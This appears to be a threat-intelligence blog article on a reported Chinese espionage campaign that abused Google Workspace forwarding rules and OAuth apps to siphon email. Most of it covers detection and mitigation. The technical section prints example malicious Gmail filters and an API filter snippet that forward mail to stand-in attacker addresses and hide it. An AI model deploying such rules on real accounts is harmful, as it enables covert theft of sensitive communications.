Chinese Hackers Weaponized Google Workspace Email Rules

Chinese state-sponsored threat actors have developed a sophisticated email exfiltration technique that abuses legitimate Google Workspace email forwarding rules. The campaign targeted defense contractors and research institutions, automatically forwarding sensitive emails to attacker-controlled accounts while evading traditional security controls. This novel persistence mechanism operates within Google’s trusted infrastructure, making detection exceptionally challenging without specific visibility into email rule configurations.

Introduction

A recent espionage campaign attributed to Chinese advanced persistent threat (APT) groups has revealed a concerning evolution in email-based intelligence collection. Rather than relying on traditional malware or account compromise alone, these operators established covert persistence through Google Workspace’s native email filtering and forwarding capabilities. By manipulating legitimate administrative features, attackers created invisible data exfiltration channels that bypassed conventional security monitoring.

The campaign specifically targeted organizations involved in defense research, aerospace engineering, and emerging technologies development. Victims included contractors working on classified projects and academic institutions conducting sensitive research with dual-use applications. The operation demonstrates increasing sophistication in leveraging cloud platform features as offensive capabilities, representing a significant shift in tradecraft that security teams must urgently address.

This technique’s effectiveness stems from its abuse of trusted functionality. Security tools rarely flag email rule modifications as malicious activity, and forwarding rules can persist indefinitely even after initial compromise vectors are remediated. The attackers demonstrated patience and operational discipline, maintaining access for extended periods while minimizing detectable footprints.

Background & Context

Google Workspace (formerly G Suite) has become the email infrastructure backbone for millions of organizations worldwide, including government agencies, defense contractors, and research institutions. Its powerful automation features—designed to improve productivity—include sophisticated email filtering, labeling, and forwarding rules that users and administrators can configure through both the web interface and API access.

Chinese state-sponsored cyber espionage operations have historically prioritized intelligence collection from defense industrial base (DIB) organizations and academic research institutions. Previous campaigns like Cloud Hopper, APT10’s managed service provider attacks, and various supply chain compromises established patterns of targeting upstream technology providers and research partners to access downstream classified information.

The shift toward cloud-based email platforms created new opportunities for persistent access. Traditional on-premises Exchange servers offered attackers server-side rule manipulation, but cloud platforms like Google Workspace introduced additional complexity for both attackers and defenders. The centralized nature of cloud services means compromised credentials or OAuth tokens provide immediate access to powerful administrative APIs.

This particular campaign appears linked to broader efforts by multiple Chinese APT groups to collect intelligence on hypersonic weapons research, artificial intelligence development, semiconductor manufacturing, and quantum computing—all areas identified as strategic priorities in China’s national technology development plans. The targeting patterns align with known collection requirements from previous reporting on groups like APT41, Gallium, and various Ministry of State Security (MSS)-affiliated operators.

Technical Breakdown

The attack chain begins with initial access through credential harvesting, typically via spearphishing campaigns delivering convincing pretext emails with malicious links to credential harvesting pages. These pages clone legitimate Google authentication interfaces, capturing usernames and passwords. In more sophisticated variants, attackers also harvested multi-factor authentication codes through real-time phishing proxies using frameworks like Evilginx2 or Modlishka.

Once authenticated, attackers immediately establish persistence through multiple Google Workspace features:

Email Forwarding Rules: Using Gmail’s filter functionality, attackers create rules matching broad criteria:

Matches: from:(*) 
Do this: Forward to attacker-controlled-email@external-domain.com

More sophisticated rules target specific keywords related to classified projects, contract numbers, or personnel names:

Matches: subject:(ITAR OR "controlled unclassified" OR CUI OR "export control")
Do this: Forward to exfil-account@gmail.com AND Mark as read AND Delete it

OAuth Token Abuse: Attackers register malicious OAuth applications with innocuous names like “Email Backup Service” or “Mobile Sync Helper,” requesting broad Gmail API permissions. Once users approve these applications, tokens provide persistent API access independent of password changes:

Scope: https://www.googleapis.com/auth/gmail.modify
Scope: https://www.googleapis.com/auth/gmail.settings.basic

API-Based Rule Creation: For stealth, attackers use Gmail API calls rather than web interface rule creation:

filter_content = {
    'criteria': {
        'from': 'senior-executive@targetorg.com'
    },
    'action': {
        'forward': 'collection@attacker-infrastructure.com',
        'removeLabelIds': ['UNREAD', 'INBOX']
    }
}

The rules often include actions to mark forwarded emails as read and move them to archived folders, reducing victim awareness. Some variants applied labels mimicking legitimate organizational classification markings, blending malicious rules among legitimate automation.

Attackers demonstrated operational security by using compromised Gmail accounts as intermediate collection points rather than obviously suspicious external domains. This technique leverages Google’s trusted infrastructure for the entire exfiltration chain, avoiding external email gateway scrutiny.

Impact & Risk Assessment

The campaign’s impact extends across multiple dimensions of organizational security. Most critically, the technique provides long-term access to sensitive communications without requiring persistent network presence or malware deployment. Organizations that detected and remediated initial compromise vectors likely remained compromised through email forwarding rules that survived incident response efforts.

Intelligence Loss: Affected defense contractors potentially exposed classified project communications, technical specifications, personnel security information, and contractual details. Research institutions leaked unpublished findings, grant proposals, and collaborative research data. The cumulative intelligence value likely spans multiple collection cycles and strategic technology areas.

Persistence Duration: Forensic analysis of several victims revealed email forwarding rules active for 18-24 months before detection. During this period, thousands of emails containing sensitive information were exfiltrated. The delayed detection resulted from security tool blind spots around email rule monitoring.

Lateral Movement Implications: Compromised email access enabled attackers to identify additional targets through organizational charts, project team communications, and supply chain relationships. Subsequent phishing campaigns leveraged legitimate email threads and contextual information only available through prior email access.

Compliance Violations: Organizations subject to International Traffic in Arms Regulations (ITAR), Controlled Unclassified Information (CUI) requirements, or Defense Federal Acquisition Regulation Supplement (DFARS) compliance likely experienced reportable incidents requiring disclosure to Department of Defense oversight bodies.

The technique’s risk profile remains elevated because the fundamental capability exists across all Google Workspace implementations. Any organization using Google Workspace faces exposure if security monitoring doesn’t include email rule auditing.

Vendor Response

Google’s Threat Analysis Group (TAG) identified the campaign through anomaly detection in email rule creation patterns and coordinated with affected organizations. The company issued security advisories through Workspace administrator channels and enhanced its built-in security features.

Google implemented several platform-level improvements:

• Enhanced anomaly detection for email rule creation, particularly rules forwarding to external domains
• Administrative alerts for bulk email forwarding rule deployment
• Security Health dashboard warnings for accounts with active external forwarding rules
• Improved OAuth consent screen warnings for applications requesting Gmail modification permissions

The company emphasized that the abused functionality represents legitimate features working as designed. Google’s position maintains that security responsibility is shared between the platform provider and organizational administrators who must implement appropriate monitoring and access controls.

Google recommended all Workspace administrators enable security alerts, review existing email forwarding rules across the organization, and implement context-aware access policies restricting rule creation based on user location and device posture.

Mitigations & Workarounds

Organizations must implement multi-layered controls to prevent and detect email rule abuse:

Administrative Controls:

1. Audit all existing email forwarding rules
Disable external email forwarding via Workspace admin console:
   Apps > Google Workspace > Gmail > User Settings > 
   Email forwarding > Disable forwarding to external addresses
Implement allowlists for approved external forwarding domains

OAuth Application Management:

1. Review connected applications for all users
Implement OAuth application allowlisting
Enable "Trust internal, domain-owned apps" only
Regularly audit API access scopes granted to third-party apps

Conditional Access Policies:

Configure context-aware access rules requiring additional authentication for sensitive actions:

- Email rule creation from unrecognized locations: Require re-authentication
API access from new devices: Require admin approval
Forwarding rule modifications: Generate admin alert

Account Hardening:

• Enforce hardware security key-based MFA for all accounts
• Implement Advanced Protection Program for high-risk users
• Enable login challenge for unusual activity
• Require admin approval for OAuth grants requesting Gmail modification scopes

Organizations should prioritize disabling external email forwarding entirely unless specific business requirements exist, then implement allowlist-based exceptions with compensating controls.

Detection & Monitoring

Effective detection requires visibility into email rule configurations and API activity:

Gmail Audit Log Analysis:

Monitor Google Workspace audit logs for email setting modifications:

Event: gmail_setting_change
Category: EMAIL_SETTINGS
Type: FILTER_CREATED, FILTER_MODIFIED
Parameters: filter_action contains "FORWARD"

Suspicious Rule Patterns:

Alert on rules matching these characteristics:

• Forwarding to external domains (non-organizational)
• Rules that delete or archive after forwarding
• Broad matching criteria (wildcard senders/subjects)
• Rules created outside normal business hours
• Bulk rule creation across multiple accounts
• Rules created immediately following initial authentication

API Activity Monitoring:

Track Gmail API calls for programmatic rule manipulation:

API Method: gmail.users.settings.filters.create
User Agent: Unusual or scripted clients
Source IP: Non-corporate network ranges
Volume: Multiple filter creations within short timeframes

OAuth Token Review:

Regularly audit OAuth tokens with Gmail modification permissions:

# Using GAM (Google Apps Manager)
gam all users show tokens

Implement Security Information and Event Management (SIEM) correlation rules combining authentication anomalies with email rule creation events. Legitimate rule creation typically correlates with interactive web sessions, while API-based creation may indicate compromise.

Best Practices

Organizations should implement comprehensive email security programs addressing both technical controls and user awareness:

Security Architecture:

• Deploy Cloud Access Security Broker (CASB) solutions with Google Workspace integration for enhanced visibility
• Implement Data Loss Prevention (DLP) policies scanning outbound emails for sensitive content
• Enable Google Workspace Enterprise Plus security features including advanced phishing protection
• Configure Security Investigation Tool for email forensics capabilities

Operational Procedures:

• Schedule quarterly email rule audits across all user accounts
• Establish baseline expected email rule usage patterns
• Create incident response playbooks specifically for email compromise scenarios
• Implement separation of duties for email administrative functions

User Education:

• Train users to recognize OAuth consent prompts requesting excessive permissions
• Educate about credential phishing techniques targeting Google accounts
• Establish clear procedures for reporting suspicious authentication requests
• Conduct simulated phishing exercises including credential harvesting scenarios

Threat Intelligence Integration:

• Monitor reporting on APT email-based persistence techniques
• Integrate threat intelligence feeds identifying malicious OAuth applications
• Participate in information sharing communities relevant to your sector
• Subscribe to Google TAG threat reports and vendor security advisories

Organizations in defense, research, and technology sectors should consider enhanced security baselines exceeding standard Google Workspace configurations, including mandatory hardware token authentication and restricted API access.

Key Takeaways

• Chinese APT groups successfully weaponized legitimate Google Workspace email forwarding features for long-term espionage
• Email rule manipulation provides persistent access independent of password changes or malware removal
• Traditional security tools often lack visibility into email rule configurations and modifications
• Detection requires specific audit log monitoring and email rule inventory management
• Organizations must balance productivity features against security requirements through risk-based controls
• Cloud platform security requires understanding and monitoring native features that can be abused
• Incident response procedures must include email rule review as standard compromise assessment practice
• Defense-in-depth approaches combining technical controls, monitoring, and user awareness provide optimal protection

This campaign demonstrates that sophisticated threat actors continuously adapt tradecraft to exploit trusted platform features. Security programs must evolve beyond perimeter-focused defenses toward comprehensive visibility across cloud service configurations and user-enabled automation.

References

• Google Threat Analysis Group – Workspace Security Advisories
• MITRE ATT&CK Technique T1114.003 – Email Forwarding Rule
• CISA Alert – Email Forwarding Rule Abuse by Nation-State Actors
• Google Workspace Admin Help – Email Delegation and Forwarding Settings
• NIST Special Publication 800-177 – Trustworthy Email
• Mandiant APT Groups Tracking – Chinese Espionage Clusters
• Gmail API Documentation – Filters and Settings Management
• NSA Cybersecurity Advisory – Mitigating Cloud Vulnerabilities

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/